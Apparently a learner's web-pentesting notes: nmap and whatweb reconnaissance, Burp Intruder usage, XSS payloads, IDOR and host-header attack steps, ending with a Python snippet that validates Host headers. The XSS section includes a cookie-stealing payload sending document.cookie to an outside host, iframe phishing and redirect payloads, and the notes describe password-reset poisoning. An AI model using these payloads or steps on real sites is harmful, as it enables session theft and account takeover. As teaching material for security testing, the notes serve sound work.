Information gathering:
1. site
2. subdomains -> virustotal.com
3. IP address -> ping any.com
4. Find the programming language of the website:
Google Search – site:any.com .jsp/aspx/php/asp/jspx...
Kali – whatweb any.com (also check the X-Powered-By response header)
5. Open ports and Services:
nmap domain/ip
nmap ip -Pn (if the ping probe is blocked by the normal scan, skip host discovery)
Service/version scan (more aggressive): nmap ip -sV (if probes are blocked, append -Pn at the end)
Detailed scan: nmap ip, or nmap -sC ip (runs the default scripts)
6. Server info:
whatweb any.com or ssltest.com (the server signature reveals many more things)
Intruder in Burp Suite:
Attack type – Sniper (applies each payload to a single marked parameter, one position at a time)
Battering Ram (applies the same payload to all marked parameters at once)
Load the payload list, run it and check for 200 status responses after browsing; try once with URL encoding checked and once with it unchecked.
XSS:
prompt.ml -> A website to test XSS with different challenges/payloads
Find the parameter which is reflected back –> test it manually or send payloads through Intruder
With Intruder and a loaded payload list: compare each response length against the baseline (payload 0). If a payload gets executed the response usually differs in length, typically greater than the baseline, though it may also show up at a smaller length.
URL redirection -> <script>document.location.href="http://bing.com"</script>
Phishing: <iframe src="http://bing.com"></iframe>
Cookie stealing: <script>alert(document.cookie)</script>
<script>document.location.href="http://bing.com/p/?page="+document.cookie</script>
Through file upload -> if a file upload option is available and the file name is visible in the page source after uploading (the file name is reflected), then XSS may be possible. Apply an XSS payload as the file name and check.
IDOR – Insecure Direct Object Reference
Log in as account A -> Edit Profile A -> capture the user ID, suppose abcd
Log in as account B -> Edit Profile B -> pass the user ID of A here and forward the request -> now check for changes in account A
The user reference can also be changed directly in the URL
Host Header Attack: Open Redirection
Check the status code = 2XX (200, 201, 202, ...) or 3XX (300, 301, ...)
In the request headers below the GET line:
1. Capture the request -> Host: replace the real website with a test website such as bing.com
If it redirects to bing.com then there is a host header attack.
2. Change realweb.com to bing.com and set X-Forwarded-Host to realweb.com
like – Host: bing.com
X-Forwarded-Host: realweb.com
3. Vice versa of the 2nd point
Host Header Attack: Web Cache Poisoning
4. Change the Host as above - Host: bing.com
In the response, if bing.com is visible in an href then there is web cache poisoning
In the browser, the response will render as a link. When it is clicked in the UI, it will redirect to bing.com
Host Header Attack: Password Reset Page
5. Suppose a website sends a password reset link for resetting the password.
An attacker changes the host in the request that generates this link. The link the user receives in the mail then points to the attacker's host, so the user's password change will not work (the host in the URL is different), but the attacker sees the requested password reset link in their log and can change the user's password by manually changing the URL host back in that link.
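The server-side fix for the three host header cases above is to never build absolute URLs (redirect targets, cached hrefs, password reset links) from the incoming Host or X-Forwarded-Host header. The following is an added example, not part of these notes or any course material; realweb.com and the ALLOWED_HOSTS set are assumed values.

```python
from typing import Dict, Optional
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"realweb.com", "www.realweb.com"}  # assumption: hosts we serve
CANONICAL_ORIGIN = "https://realweb.com"            # configured, not request-derived


def _normalise(value: str) -> str:
    """Lower-case a header value and drop an optional :port suffix."""
    return value.strip().lower().split(":")[0]


def host_is_allowed(headers: Dict[str, str]) -> bool:
    """True only if Host and every X-Forwarded-Host entry are on the allowlist.

    This blocks all three tricks from the notes: a foreign Host, a foreign
    X-Forwarded-Host behind a real Host, and the reverse.
    """
    norm = {k.lower(): v for k, v in headers.items()}
    host = norm.get("host")
    if host is None or _normalise(host) not in ALLOWED_HOSTS:
        return False
    for entry in norm.get("x-forwarded-host", "").split(","):
        if entry.strip() and _normalise(entry) not in ALLOWED_HOSTS:
            return False
    return True


def build_reset_link(headers: Dict[str, str], token: str) -> Optional[str]:
    """Password reset link built from the configured origin, never from Host."""
    if not host_is_allowed(headers):
        return None  # refuse rather than mail a poisoned link
    return f"{CANONICAL_ORIGIN}/reset?token={token}"


def safe_redirect_target(target: str) -> str:
    """Allow only same-site redirects; anything else falls back to the site root."""
    if "\\" in target:
        return "/"  # browsers treat /\host like //host
    parts = urlsplit(target)
    if parts.scheme == "" and parts.netloc == "" and target.startswith("/"):
        return target  # plain relative path
    if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS:
        return target
    return "/"
```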
Reference – (These contents are part of notes prepared by me, from multiple sources. Major parts are taken from the Vikash Chaudhary course on Udemy (for more details visit this course on Udemy))